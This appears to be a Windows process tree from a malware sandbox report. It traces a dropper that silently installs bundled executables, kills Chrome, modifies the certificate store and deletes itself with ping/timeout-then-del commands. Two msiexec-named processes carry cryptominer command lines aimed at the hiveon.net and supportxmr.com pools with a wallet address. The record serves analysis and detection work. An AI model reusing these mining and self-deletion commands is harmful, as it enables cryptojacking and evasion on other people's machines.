C:\Users\Admin\AppData\Local\Temp\b1akvgj2md3\j3jrj05qr2q.exe"C:\Users\Admin\AppData\Local\Temp\b1akvgj2md3\j3jrj05qr2q.exe"8⤵PID:5292
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\b1akvgj2md3\j3jrj05qr2q.exe"9⤵PID:6136
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lpeuslzrnpw\rmffadigfr2.exe"C:\Users\Admin\AppData\Local\Temp\lpeuslzrnpw\rmffadigfr2.exe" /ustwo INSTALL8⤵PID:5376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rmffadigfr2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lpeuslzrnpw\rmffadigfr2.exe" & exit9⤵PID:5712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rmffadigfr2.exe" /f10⤵
- Kills process with taskkill
PID:3600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jlr5xaazxnl\vpn.exe"C:\Users\Admin\AppData\Local\Temp\jlr5xaazxnl\vpn.exe" /silent /subid=4828⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\is-09PQG.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-09PQG.tmp\vpn.tmp" /SL5="$20476,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jlr5xaazxnl\vpn.exe" /silent /subid=4829⤵PID:5508
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5616
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4020
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34k2n1at134\bawxdqbvhhu.exe"C:\Users\Admin\AppData\Local\Temp\34k2n1at134\bawxdqbvhhu.exe" /quiet SILENT=1 AF=7568⤵PID:5404
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\34k2n1at134\bawxdqbvhhu.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\34k2n1at134\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277425 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\c13lgrrtpse\jjror2lw542.exe"C:\Users\Admin\AppData\Local\Temp\c13lgrrtpse\jjror2lw542.exe" /VERYSILENT8⤵PID:420
-
-
C:\Users\Admin\AppData\Local\Temp\gpsyx4h45pe\vict.exe"C:\Users\Admin\AppData\Local\Temp\gpsyx4h45pe\vict.exe" /VERYSILENT /id=5358⤵PID:1092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8INQ0QJ1FP\setups.exe"C:\Users\Admin\AppData\Local\Temp\8INQ0QJ1FP\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Users\Admin\AppData\Local\Temp\is-E7UG6.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-E7UG6.tmp\setups.tmp" /SL5="$500C8,454998,229376,C:\Users\Admin\AppData\Local\Temp\8INQ0QJ1FP\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4424
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4484
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:1532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:944
-
C:\Users\Admin\AppData\Roaming\E06.tmp.exe"C:\Users\Admin\AppData\Roaming\E06.tmp.exe"5⤵PID:2008
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:3100
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:4060
-
-
-
C:\Users\Admin\AppData\Roaming\F9D.tmp.exe"C:\Users\Admin\AppData\Roaming\F9D.tmp.exe"5⤵PID:4632
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\F9D.tmp.exe6⤵PID:1116
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5288
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5808
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:4920
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:416
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4156
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\is-G8U1V.tmp\jjror2lw542.tmp"C:\Users\Admin\AppData\Local\Temp\is-G8U1V.tmp\jjror2lw542.tmp" /SL5="$50304,2592217,780800,C:\Users\Admin\AppData\Local\Temp\c13lgrrtpse\jjror2lw542.exe" /VERYSILENT1⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\is-H8JAQ.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-H8JAQ.tmp\winlthsth.exe"2⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\oTxCH5MgY.exe"C:\Users\Admin\AppData\Local\Temp\oTxCH5MgY.exe"3⤵PID:9388
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:11060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IED2L.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IED2L.tmp\vict.tmp" /SL5="$702D0,870426,780800,C:\Users\Admin\AppData\Local\Temp\gpsyx4h45pe\vict.exe" /VERYSILENT /id=5351⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\is-8OHJG.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-8OHJG.tmp\win1host.exe" 5352⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\V0AoMgeL4.exe"C:\Users\Admin\AppData\Local\Temp\V0AoMgeL4.exe"3⤵PID:7672
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\4cbd59f8420041c3ae5f257e9c29072c /t 1116 /p 50441⤵PID:4688
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5684
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1A9AD06BEEFC5B97AD1C3F242CB618C0 C2⤵PID:4160
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8457003DC6FDDBF22CE89E6910EEF5DC2⤵PID:4524
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5284
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\bed3b4f8094f4b90854253fc8ba8c9a0 /t 0 /p 52841⤵PID:3556
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6396
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\5a9b46d4e3384433923c203a3e85db21 /t 0 /p 63961⤵PID:7132
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:3548
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1f264d2d-d772-4140-9c7c-120a931b1311}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:9448
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵PID:9676
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:9736
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:9728
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:10944